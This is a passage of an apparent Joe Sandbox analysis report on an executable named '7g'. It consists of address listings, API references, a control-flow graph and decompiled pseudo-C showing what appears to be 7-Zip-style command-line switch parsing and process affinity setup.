                                                                                                                    0x00b48dce
                                                                                                                    0x00b48c82
                                                                                                                    0x00b48c89
                                                                                                                    0x00b48c8c
                                                                                                                    0x00b48c91
                                                                                                                    0x00b48c93
                                                                                                                    0x00b48c98
                                                                                                                    0x00b48c9e
                                                                                                                    0x00b48cad
                                                                                                                    0x00b48ca0
                                                                                                                    0x00b48ca4
                                                                                                                    0x00b48ca7
                                                                                                                    0x00b48cc6
                                                                                                                    0x00b48cdb
                                                                                                                    0x00b48cf1
                                                                                                                    0x00b48cf7
                                                                                                                    0x00b48d04
                                                                                                                    0x00b48d0d
                                                                                                                    0x00b48d11
                                                                                                                    0x00b48d15
                                                                                                                    0x00b48d1b
                                                                                                                    0x00b48d20
                                                                                                                    0x00b48d25
                                                                                                                    0x00b48d28
                                                                                                                    0x00b48d2f
                                                                                                                    0x00b48d2f
                                                                                                                    0x00000000
                                                                                                                    0x00b48c89
                                                                                                                    0x00b489d9
                                                                                                                    0x00b489e9
                                                                                                                    0x00b48a06
                                                                                                                    0x00b48a08
                                                                                                                    0x00b48a0c
                                                                                                                    0x00b48a13
                                                                                                                    0x00b48a56
                                                                                                                    0x00b48a5a
                                                                                                                    0x00b48a62
                                                                                                                    0x00b48ab0
                                                                                                                    0x00b48ab4
                                                                                                                    0x00b48abf
                                                                                                                    0x00b48ac8
                                                                                                                    0x00b48acf
                                                                                                                    0x00b48ad4
                                                                                                                    0x00b48adc
                                                                                                                    0x00b48ae0
                                                                                                                    0x00b48b3f
                                                                                                                    0x00b48b41
                                                                                                                    0x00b48b46
                                                                                                                    0x00b48b4f
                                                                                                                    0x00b48b57
                                                                                                                    0x00b48b60
                                                                                                                    0x00b48b76
                                                                                                                    0x00b48b79
                                                                                                                    0x00b48b7a
                                                                                                                    0x00b48b82
                                                                                                                    0x00b48c2e
                                                                                                                    0x00b48c30
                                                                                                                    0x00b48c35
                                                                                                                    0x00b48c3c
                                                                                                                    0x00b48c41
                                                                                                                    0x00b48c4e
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b48b88
                                                                                                                    0x00b48b88
                                                                                                                    0x00b48b8c
                                                                                                                    0x00b48b95
                                                                                                                    0x00b48b9c
                                                                                                                    0x00b48ba3
                                                                                                                    0x00b48ba7
                                                                                                                    0x00b48baa
                                                                                                                    0x00b48bb1
                                                                                                                    0x00b48bb3
                                                                                                                    0x00b48bb7
                                                                                                                    0x00b48bbd
                                                                                                                    0x00b48bbf
                                                                                                                    0x00b48bc3
                                                                                                                    0x00b48bc9
                                                                                                                    0x00b48bce
                                                                                                                    0x00b48bd4
                                                                                                                    0x00b48bd7
                                                                                                                    0x00b48bda
                                                                                                                    0x00b48be0
                                                                                                                    0x00b48be7
                                                                                                                    0x00b48be7
                                                                                                                    0x00b48be2
                                                                                                                    0x00b48be2
                                                                                                                    0x00b48be2
                                                                                                                    0x00b48bf0
                                                                                                                    0x00b48bf6
                                                                                                                    0x00b48bfd
                                                                                                                    0x00b48c04
                                                                                                                    0x00b48c04
                                                                                                                    0x00b48bff
                                                                                                                    0x00b48bff
                                                                                                                    0x00b48bff
                                                                                                                    0x00b48bfd
                                                                                                                    0x00b48c0d
                                                                                                                    0x00b48c0f
                                                                                                                    0x00b48c12
                                                                                                                    0x00b48c1a
                                                                                                                    0x00b48bb3
                                                                                                                    0x00b48c1f
                                                                                                                    0x00b48c25
                                                                                                                    0x00000000
                                                                                                                    0x00b48b88
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b48ae2
                                                                                                                    0x00b48ae2
                                                                                                                    0x00b48ae2
                                                                                                                    0x00b48ae6
                                                                                                                    0x00b48aeb
                                                                                                                    0x00b48aeb
                                                                                                                    0x00b48afd
                                                                                                                    0x00b48b00
                                                                                                                    0x00b48b0c
                                                                                                                    0x00b48b16
                                                                                                                    0x00b48b25
                                                                                                                    0x00b48b2f
                                                                                                                    0x00b48b2f
                                                                                                                    0x00b48b34
                                                                                                                    0x00b48b3a
                                                                                                                    0x00b48b3a
                                                                                                                    0x00000000
                                                                                                                    0x00b48ae2
                                                                                                                    0x00b48a64
                                                                                                                    0x00b48a6c
                                                                                                                    0x00b48a9a
                                                                                                                    0x00b48a9f
                                                                                                                    0x00b48aa3
                                                                                                                    0x00b48aac
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b48a6e
                                                                                                                    0x00b48a6e
                                                                                                                    0x00b48a6e
                                                                                                                    0x00b48a73
                                                                                                                    0x00b48a79
                                                                                                                    0x00b48a83
                                                                                                                    0x00b48a7b
                                                                                                                    0x00b48a7b
                                                                                                                    0x00b48a7b
                                                                                                                    0x00b48a7b
                                                                                                                    0x00b48a8b
                                                                                                                    0x00b48a8d
                                                                                                                    0x00b48a95
                                                                                                                    0x00000000
                                                                                                                    0x00b48a6e
                                                                                                                    0x00b48a15
                                                                                                                    0x00b48a15
                                                                                                                    0x00b48a1a
                                                                                                                    0x00b48a1f
                                                                                                                    0x00b48a3f
                                                                                                                    0x00b48a3f
                                                                                                                    0x00000000
                                                                                                                    0x00b48a21
                                                                                                                    0x00b48a21
                                                                                                                    0x00b48a41
                                                                                                                    0x00b48a47
                                                                                                                    0x00b48a49
                                                                                                                    0x00b48a54
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b48a54
                                                                                                                    0x00b48a1f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b4890f
                                                                                                                    0x00b4890f
                                                                                                                    0x00b4890f
                                                                                                                    0x00b48912
                                                                                                                    0x00b48915
                                                                                                                    0x00b48921
                                                                                                                    0x00b48927
                                                                                                                    0x00b4892b
                                                                                                                    0x00b48933
                                                                                                                    0x00b48a29
                                                                                                                    0x00b48a2e
                                                                                                                    0x00b48a33
                                                                                                                    0x00b48a39
                                                                                                                    0x00b48a3a
                                                                                                                    0x00b48a3a
                                                                                                                    0x00b48a3a
                                                                                                                    0x00b4894e
                                                                                                                    0x00b48953
                                                                                                                    0x00b4895a
                                                                                                                    0x00b4895f
                                                                                                                    0x00b48967
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b48967
                                                                                                                    0x00000000
                                                                                                                    0x00b4890f
                                                                                                                    0x00b4887b
                                                                                                                    0x00b48895
                                                                                                                    0x00b48895
                                                                                                                    0x00b4889a
                                                                                                                    0x00b4889f
                                                                                                                    0x00b488a5
                                                                                                                    0x00b488a6
                                                                                                                    0x00000000
                                                                                                                    0x00b48886
                                                                                                                    0x00b4888c
                                                                                                                    0x00b48891
                                                                                                                    0x00b48893
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b48893

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00B4A3E5: fputs.MSVCRT ref: 00B4A3FE
                                                                                                                      • Part of subcall function 00B4A3E5: fputs.MSVCRT ref: 00B4A415
                                                                                                                    • GetStdHandle.KERNEL32(000000F5,?,?,?,?,?,?,?), ref: 00B487EC
                                                                                                                    • GetConsoleScreenBufferInfo.KERNELBASE(00000000,?,?,?,?,?,?), ref: 00B487F3
                                                                                                                    • _CxxThrowException.MSVCRT(?,00B90AD8), ref: 00B488A6
                                                                                                                    • _CxxThrowException.MSVCRT(?,00B90AD8), ref: 00B488EA
                                                                                                                      • Part of subcall function 00B11FFC: __EH_prolog.LIBCMT ref: 00B12001
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionThrowfputs$BufferConsoleH_prologHandleInfoScreen
                                                                                                                    • String ID: $ || $Codecs:$Formats:$Hashers:$KSNFMGOPBELHXCc+a+m+r+$P$offset=$S
                                                                                                                    • API String ID: 377453556-626468309
                                                                                                                    • Opcode ID: c26c701e48e1832b4ec35f9ae40b33603800f4f4780d2427a08c62de5d5db103
                                                                                                                    • Instruction ID: d8ac2be2b17b4278899fb9d826d9ced0ae9c94b5d0e2b7afc010a9892e4308cd
                                                                                                                    • Opcode Fuzzy Hash: c26c701e48e1832b4ec35f9ae40b33603800f4f4780d2427a08c62de5d5db103
                                                                                                                    • Instruction Fuzzy Hash: B3229B31900208DFDF15EFA4D885BADBBF1FF48300F24449AE545AB292CB759A81DF61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B207E4 Relevance: 42.3, APIs: 16, Strings: 8, Instructions: 288COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 672 b207e4-b2081a __EH_prolog call b113f5 675 b20838-b20891 _fileno _isatty _fileno _isatty _fileno _isatty 672->675 676 b2081c-b20833 call b30b3c _CxxThrowException 672->676 678 b208a3-b208a5 675->678 679 b20893-b20897 675->679 676->675 682 b208a6-b208d3 678->682 679->678 681 b20899-b2089d 679->681 681->678 683 b2089f-b208a1 681->683 684 b208d5-b208fe call b20baa call b127b7 call b11e89 682->684 685 b208ff-b20918 682->685 683->682 684->685 686 b20926 685->686 687 b2091a-b2091e 685->687 691 b2092d-b20931 686->691 687->686 690 b20920-b20924 687->690 690->686 690->691 693 b20933 691->693 694 b2093a-b20944 691->694 693->694 696 b20946-b20949 694->696 697 b2094f-b20959 694->697 696->697 699 b20964-b2096e 697->699 700 b2095b-b2095e 697->700 701 b20970-b20973 699->701 702 b20979-b2097f 699->702 700->699 701->702 704 b20981-b2098d 702->704 705 b209cf-b209d8 702->705 706 b2099b-b209a7 call b20bd7 704->706 707 b2098f-b20999 704->707 708 b209f0 call b20bbf 705->708 709 b209da-b209ec 705->709 716 b209c6-b209c9 706->716 717 b209a9-b209c1 call b30b3c _CxxThrowException 706->717 707->705 713 b209f5-b209fe 708->713 709->708 714 b20a00-b20a10 713->714 715 b20a3d-b20a46 713->715 718 b20a16 714->718 719 b20ac8-b20ada wcscmp 714->719 721 b20b99-b20ba7 715->721 722 b20a4c-b20a58 715->722 716->705 717->716 723 b20a1d-b20a25 call b190b8 718->723 719->723 725 b20ae0-b20aec call b20bd7 719->725 722->721 726 b20a5e-b20a99 call b126d9 call b12808 call b131ad call b13c2c 722->726 723->715 733 b20a27-b20a38 call b6b320 call b19032 723->733 725->723 734 b20af2-b20b0a call b30b3c _CxxThrowException 725->734 754 b20aa5-b20aa9 726->754 755 b20a9b-b20aa2 726->755 733->715 742 b20b0f-b20b12 734->742 745 b20b37-b20b50 call b20c1b GetCurrentProcess SetProcessAffinityMask 742->745 746 b20b14 742->746 759 b20b52-b20b88 GetLastError call b131ad call b155c8 call b13171 call b11e89 745->759 760 b20b89-b20b98 call b130fe call b11e89 745->760 749 b20b16-b20b18 746->749 750 b20b1a-b20b32 call b30b3c _CxxThrowException 746->750 749->745 749->750 750->745 754->742 758 b20aab-b20ac3 call b30b3c _CxxThrowException 754->758 755->754 758->719 759->760 760->721
                                                                                                                    C-Code - Quality: 63%
                                                                                                                    			E00B207E4(long __ecx, void* __edx, void* __eflags) {
				signed short** _t110;
				void* _t112;
				void* _t113;
				signed int _t114;
				signed int _t124;
				char* _t126;
				char* _t141;
				char* _t143;
				char* _t145;
				void* _t146;
				signed int _t147;
				wchar_t*** _t149;
				int _t157;
				long _t159;
				void* _t161;
				void* _t162;
				void* _t171;
				signed int _t176;
				void* _t186;
				void* _t187;
				void* _t221;
				intOrPtr* _t227;
				long _t228;
				signed int _t229;
				char* _t233;
				wchar_t** _t235;
				void* _t237;
				void* _t278;

				L00B7F140(0xb83580, _t237);
				_push( *(_t237 + 8));
				 *(_t237 - 0x10) = __ecx;
				 *(__ecx + 0x30) =  *(__ecx + 0x30) & 0x00000000;
				_t110 = __ecx + 0x2c;
				 *(_t237 - 0x14) = _t110;
				_push(0x3d);
				_push(0xb9a148);
				 *( *_t110) =  *( *_t110) & 0x00000000;
				_t112 = L00B113F5(__ecx, __eflags);
				_t244 = _t112;
				if(_t112 == 0) {
					_push( *((intOrPtr*)(__ecx + 0x20)));
					_push( *((intOrPtr*)(__ecx + 0x14)));
					E00B30B3C(_t237 - 0x2c, _t244);
					_push(0xb91428);
					_push(_t237 - 0x2c);
					L00B7F160();
				}
				_t227 = __imp___fileno; // 0x766e3130
				_t113 =  *_t227(__imp___iob);
				_t192 = __imp___isatty;
				_t114 =  *_t192(_t113);
				_t233 =  *((intOrPtr*)(_t237 + 0xc));
				 *((char*)(_t233 + 3)) = _t114 & 0xffffff00 | _t114 != 0x00000000;
				 *((char*)(_t233 + 4)) =  *_t192( *_t227(__imp___iob + 0x20)) & 0xffffff00 | _t119 != 0x00000000;
				_t124 =  *_t192( *_t227(__imp___iob + 0x40));
				_t228 =  *(_t237 - 0x10);
				 *((char*)(_t233 + 5)) = _t124 & 0xffffff00 | _t124 != 0x00000000;
				_t126 =  *_t228;
				if( *_t126 != 0 ||  *((char*)(_t126 + 0x14)) != 0 ||  *((char*)(_t126 + 0x28)) != 0) {
					_push(1);
					_pop(0);
				}
				 *_t233 = 0;
				 *((char*)(_t233 + 6)) =  *((intOrPtr*)( *_t228 + 0x26c));
				 *((char*)(_t233 + 7)) =  *((intOrPtr*)( *_t228 + 0x280));
				 *((char*)(_t233 + 8)) =  *_t228 & 0xffffff00 |  *((char*)( *_t228 + 0x3c)) == 0x00000000;
				if( *((char*)( *_t228 + 0x2e4)) != 0) {
					_t186 = E00B20BAA();
					 *(_t237 - 4) =  *(_t237 - 4) & 0x00000000;
					_t187 = E00B127B7(_t233 + 0x1c, _t186);
					 *(_t237 - 4) =  *(_t237 - 4) | 0xffffffff;
					E00B11E89(_t187,  *((intOrPtr*)(_t237 - 0x2c)));
				}
				 *((char*)(_t233 + 0xb)) =  *((intOrPtr*)( *_t228 + 0x2d0));
				 *((char*)(_t233 + 0xc)) =  *((intOrPtr*)( *_t228 + 0x64));
				if( *((char*)( *_t228 + 0x50)) != 0 ||  *((char*)(_t233 + 7)) != 0 ||  *((char*)(_t233 + 4)) == 0) {
					 *(_t233 + 0x228) =  *(_t233 + 0x228) & 0x00000000;
				}
				if( *((char*)(_t233 + 7)) != 0) {
					 *(_t233 + 0x220) =  *(_t233 + 0x220) & 0x00000000;
				}
				_t141 =  *_t228 + 0x8c;
				if( *_t141 != 0) {
					 *(_t233 + 0x220) =  *(_t141 + 4);
				}
				_t143 =  *_t228 + 0xa0;
				if( *_t143 != 0) {
					 *((intOrPtr*)(_t233 + 0x224)) =  *((intOrPtr*)(_t143 + 4));
				}
				_t145 =  *_t228 + 0xb4;
				if( *_t145 != 0) {
					 *(_t233 + 0x228) =  *(_t145 + 4);
				}
				_t146 =  *_t228;
				if( *((char*)(_t146 + 0x78)) != 0) {
					_t192 =  *( *(_t146 + 0x80));
					if(_t192[1] != 0) {
						__eflags = E00B20BD7( *_t192, _t237 + 8);
						if(__eflags == 0) {
							_push( *_t192);
							_push("Unsupported switch postfix -bb");
							E00B30B3C(_t237 - 0x2c, __eflags);
							_push(0xb91428);
							_push(_t237 - 0x2c);
							L00B7F160();
						}
						 *(_t233 + 0x22c) =  *(_t237 + 8);
					} else {
						 *(_t233 + 0x22c) = 1;
					}
				}
				_t147 =  *_t228;
				if( *((char*)(_t147 + 0x334)) != 0) {
					_t176 = _t147 & 0xffffff00 |  *((char*)(_t147 + 0x335)) == 0x00000000;
					 *0xb9a5c0 = _t176;
					 *(_t233 + 2) = _t176;
					 *((char*)(_t233 + 1)) = 1;
				}
				E00B20BBF(); // executed
				_t149 =  *_t228;
				if(_t149[0xa5] == 0) {
					L34:
					_t229 =  *_t228;
					if( *((char*)(_t229 + 0x208)) == 0) {
						goto L50;
					}
					_t149 =  *(_t229 + 0x210);
					_t235 =  *_t149;
					if(_t235[1] == 0) {
						goto L50;
					}
					E00B126D9(_t237 - 0x20);
					 *(_t237 - 4) = 1;
					E00B12808(_t237 - 0x20,  *_t235);
					_t192 =  *(_t237 - 0x14);
					L00B131AD( *(_t237 - 0x14), "Set process affinity mask: ");
					_t221 = _t237 + 8;
					_t228 = L00B13C2C( *(_t237 - 0x20), _t221);
					if( *( *(_t237 + 8)) != 0) {
						 *(_t237 - 0x1c) =  *(_t237 - 0x1c) & 0x00000000;
						 *( *(_t237 - 0x20)) =  *( *(_t237 - 0x20)) & 0x00000000;
					}
					_t275 =  *(_t237 - 0x1c);
					if( *(_t237 - 0x1c) != 0) {
						goto L43;
					} else {
						_push( *_t235);
						_push("Unsupported switch postfix -stm");
						E00B30B3C(_t237 - 0x2c, _t275);
						_push(0xb91428);
						_push(_t237 - 0x2c);
						L00B7F160();
						goto L40;
					}
				} else {
					 *(_t237 + 8) =  *(_t237 + 8) & 0x00000000;
					_t235 =  *(_t149[0xa7]);
					if(_t235[1] != 0) {
						L40:
						if(wcscmp( *_t235, "-") == 0) {
							L32:
							_t149 = L00B190B8();
							if( *(_t237 + 8) > _t149) {
								L00B6B320();
								_t149 = E00B19032(L"SeLockMemoryPrivilege", 1);
								 *0xb9a718 = _t149;
							}
							goto L34;
						}
						_t221 = _t237 + 8;
						_t171 = E00B20BD7( *_t235, _t221);
						_t277 = _t171;
						if(_t171 != 0) {
							goto L32;
						}
						_push( *_t235);
						_push("Unsupported switch postfix for -slp");
						E00B30B3C(_t237 - 0x2c, _t277);
						_push(0xb91428);
						_push(_t237 - 0x2c);
						L00B7F160();
						L43:
						_t278 = _t221 - 1;
						if(_t278 < 0) {
							L47:
							E00B20C1B(_t192, _t228, _t221);
							_t157 = SetProcessAffinityMask(GetCurrentProcess(), _t228);
							_t280 = _t157;
							if(_t157 == 0) {
								_t159 = GetLastError();
								L00B131AD(_t192, " : ERROR : ");
								_t161 = L00B155C8(_t237 - 0x38, _t159, _t280);
								 *(_t237 - 4) = 2;
								_t162 = L00B13171(_t192, _t280, _t161);
								 *(_t237 - 4) = 1;
								E00B11E89(_t162,  *((intOrPtr*)(_t237 - 0x38)));
							}
							_t149 = E00B11E89(L00B130FE(_t192),  *(_t237 - 0x20));
							L50:
							 *[fs:0x0] =  *((intOrPtr*)(_t237 - 0xc));
							return _t149;
						}
						if(_t278 > 0) {
							L46:
							_push( *_t235);
							_push("unsupported value -stm");
							E00B30B3C(_t237 - 0x2c, _t279);
							_push(0xb91428);
							_push(_t237 - 0x2c);
							L00B7F160();
							goto L47;
						}
						_t279 = _t228;
						if(_t228 < 0) {
							goto L47;
						}
						goto L46;
					}
					 *(_t237 + 8) = 1;
					goto L32;
				}
			}































                                                                                                                    0x00b207e9
                                                                                                                    0x00b207f6
                                                                                                                    0x00b207f9
                                                                                                                    0x00b207fc
                                                                                                                    0x00b20800
                                                                                                                    0x00b20803
                                                                                                                    0x00b20806
                                                                                                                    0x00b2080a
                                                                                                                    0x00b2080f
                                                                                                                    0x00b20813
                                                                                                                    0x00b20818
                                                                                                                    0x00b2081a
                                                                                                                    0x00b2081c
                                                                                                                    0x00b20822
                                                                                                                    0x00b20825
                                                                                                                    0x00b2082d
                                                                                                                    0x00b20832
                                                                                                                    0x00b20833
                                                                                                                    0x00b20833
                                                                                                                    0x00b2083e
                                                                                                                    0x00b20844
                                                                                                                    0x00b20846
                                                                                                                    0x00b2084d
                                                                                                                    0x00b2084f
                                                                                                                    0x00b20857
                                                                                                                    0x00b2086d
                                                                                                                    0x00b2087c
                                                                                                                    0x00b2087e
                                                                                                                    0x00b20889
                                                                                                                    0x00b2088c
                                                                                                                    0x00b20891
                                                                                                                    0x00b208a3
                                                                                                                    0x00b208a5
                                                                                                                    0x00b208a5
                                                                                                                    0x00b208a6
                                                                                                                    0x00b208b0
                                                                                                                    0x00b208bb
                                                                                                                    0x00b208c7
                                                                                                                    0x00b208d3
                                                                                                                    0x00b208e0
                                                                                                                    0x00b208e5
                                                                                                                    0x00b208ed
                                                                                                                    0x00b208f5
                                                                                                                    0x00b208f9
                                                                                                                    0x00b208fe
                                                                                                                    0x00b20907
                                                                                                                    0x00b2090f
                                                                                                                    0x00b20918
                                                                                                                    0x00b20926
                                                                                                                    0x00b20926
                                                                                                                    0x00b20931
                                                                                                                    0x00b20933
                                                                                                                    0x00b20933
                                                                                                                    0x00b2093c
                                                                                                                    0x00b20944
                                                                                                                    0x00b20949
                                                                                                                    0x00b20949
                                                                                                                    0x00b20951
                                                                                                                    0x00b20959
                                                                                                                    0x00b2095e
                                                                                                                    0x00b2095e
                                                                                                                    0x00b20966
                                                                                                                    0x00b2096e
                                                                                                                    0x00b20973
                                                                                                                    0x00b20973
                                                                                                                    0x00b20979
                                                                                                                    0x00b2097f
                                                                                                                    0x00b20987
                                                                                                                    0x00b2098d
                                                                                                                    0x00b209a5
                                                                                                                    0x00b209a7
                                                                                                                    0x00b209a9
                                                                                                                    0x00b209ae
                                                                                                                    0x00b209b3
                                                                                                                    0x00b209bb
                                                                                                                    0x00b209c0
                                                                                                                    0x00b209c1
                                                                                                                    0x00b209c1
                                                                                                                    0x00b209c9
                                                                                                                    0x00b2098f
                                                                                                                    0x00b2098f
                                                                                                                    0x00b2098f
                                                                                                                    0x00b2098d
                                                                                                                    0x00b209cf
                                                                                                                    0x00b209d8
                                                                                                                    0x00b209e1
                                                                                                                    0x00b209e4
                                                                                                                    0x00b209e9
                                                                                                                    0x00b209ec
                                                                                                                    0x00b209ec
                                                                                                                    0x00b209f0
                                                                                                                    0x00b209f5
                                                                                                                    0x00b209fe
                                                                                                                    0x00b20a3d
                                                                                                                    0x00b20a3d
                                                                                                                    0x00b20a46
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b20a4c
                                                                                                                    0x00b20a52
                                                                                                                    0x00b20a58
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b20a61
                                                                                                                    0x00b20a6b
                                                                                                                    0x00b20a72
                                                                                                                    0x00b20a77
                                                                                                                    0x00b20a81
                                                                                                                    0x00b20a89
                                                                                                                    0x00b20a91
                                                                                                                    0x00b20a99
                                                                                                                    0x00b20a9e
                                                                                                                    0x00b20aa2
                                                                                                                    0x00b20aa2
                                                                                                                    0x00b20aa5
                                                                                                                    0x00b20aa9
                                                                                                                    0x00000000
                                                                                                                    0x00b20aab
                                                                                                                    0x00b20aab
                                                                                                                    0x00b20ab0
                                                                                                                    0x00b20ab5
                                                                                                                    0x00b20abd
                                                                                                                    0x00b20ac2
                                                                                                                    0x00b20ac3
                                                                                                                    0x00000000
                                                                                                                    0x00b20ac3
                                                                                                                    0x00b20a00
                                                                                                                    0x00b20a00
                                                                                                                    0x00b20a0a
                                                                                                                    0x00b20a10
                                                                                                                    0x00b20ac8
                                                                                                                    0x00b20ada
                                                                                                                    0x00b20a1d
                                                                                                                    0x00b20a1d
                                                                                                                    0x00b20a25
                                                                                                                    0x00b20a27
                                                                                                                    0x00b20a33
                                                                                                                    0x00b20a38
                                                                                                                    0x00b20a38
                                                                                                                    0x00000000
                                                                                                                    0x00b20a25
                                                                                                                    0x00b20ae2
                                                                                                                    0x00b20ae5
                                                                                                                    0x00b20aea
                                                                                                                    0x00b20aec
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b20af2
                                                                                                                    0x00b20af7
                                                                                                                    0x00b20afc
                                                                                                                    0x00b20b04
                                                                                                                    0x00b20b09
                                                                                                                    0x00b20b0a
                                                                                                                    0x00b20b0f
                                                                                                                    0x00b20b0f
                                                                                                                    0x00b20b12
                                                                                                                    0x00b20b37
                                                                                                                    0x00b20b3b
                                                                                                                    0x00b20b48
                                                                                                                    0x00b20b4e
                                                                                                                    0x00b20b50
                                                                                                                    0x00b20b52
                                                                                                                    0x00b20b61
                                                                                                                    0x00b20b6b
                                                                                                                    0x00b20b73
                                                                                                                    0x00b20b77
                                                                                                                    0x00b20b7f
                                                                                                                    0x00b20b83
                                                                                                                    0x00b20b88
                                                                                                                    0x00b20b93
                                                                                                                    0x00b20b99
                                                                                                                    0x00b20b9f
                                                                                                                    0x00b20ba7
                                                                                                                    0x00b20ba7
                                                                                                                    0x00b20b14
                                                                                                                    0x00b20b1a
                                                                                                                    0x00b20b1a
                                                                                                                    0x00b20b1f
                                                                                                                    0x00b20b24
                                                                                                                    0x00b20b2c
                                                                                                                    0x00b20b31
                                                                                                                    0x00b20b32
                                                                                                                    0x00000000
                                                                                                                    0x00b20b32
                                                                                                                    0x00b20b16
                                                                                                                    0x00b20b18
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b20b18
                                                                                                                    0x00b20a16
                                                                                                                    0x00000000
                                                                                                                    0x00b20a16

                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B207E9
                                                                                                                      • Part of subcall function 00B113F5: __EH_prolog.LIBCMT ref: 00B113FA
                                                                                                                    • _CxxThrowException.MSVCRT(?,00B91428), ref: 00B20833
                                                                                                                    • _fileno.MSVCRT ref: 00B20844
                                                                                                                    • _isatty.MSVCRT ref: 00B2084D
                                                                                                                    • _fileno.MSVCRT ref: 00B20863
                                                                                                                    • _isatty.MSVCRT ref: 00B20866
                                                                                                                    • _fileno.MSVCRT ref: 00B20879
                                                                                                                    • _CxxThrowException.MSVCRT(?,00B91428), ref: 00B209C1
                                                                                                                    • _CxxThrowException.MSVCRT(?,00B91428), ref: 00B20AC3
                                                                                                                    • wcscmp.MSVCRT ref: 00B20AD0
                                                                                                                    • _CxxThrowException.MSVCRT(?,00B91428), ref: 00B20B0A
                                                                                                                    • _isatty.MSVCRT ref: 00B2087C
                                                                                                                      • Part of subcall function 00B30B3C: __EH_prolog.LIBCMT ref: 00B30B41
                                                                                                                    • _CxxThrowException.MSVCRT(?,00B91428), ref: 00B20B32
                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,?,Set process affinity mask: ,?), ref: 00B20B41
                                                                                                                    • SetProcessAffinityMask.KERNEL32(00000000), ref: 00B20B48
                                                                                                                    • GetLastError.KERNEL32(?,Set process affinity mask: ,?), ref: 00B20B52
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionThrow$H_prolog_fileno_isatty$Process$AffinityCurrentErrorLastMaskwcscmp
                                                                                                                    • String ID: : ERROR : $01nv$SeLockMemoryPrivilege$Set process affinity mask: $Unsupported switch postfix -bb$Unsupported switch postfix -stm$Unsupported switch postfix for -slp$unsupported value -stm
                                                                                                                    • API String ID: 1826148334-807467916
                                                                                                                    • Opcode ID: 516cd48f713f0482e820f73257f68be676158f02d519c2bf36d85a4be8bd977d
                                                                                                                    • Instruction ID: 3113b4329eaf8e3329da19dc5c0730b9b0ae4f1db1be900d1f799074afc3c2fb
                                                                                                                    • Opcode Fuzzy Hash: 516cd48f713f0482e820f73257f68be676158f02d519c2bf36d85a4be8bd977d
                                                                                                                    • Instruction Fuzzy Hash: CDC1C4319103459FDF11EFA8D888BE9BBF0EF19314F1484D9E499A72A3CB74A984CB51
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B46E41 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 240COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
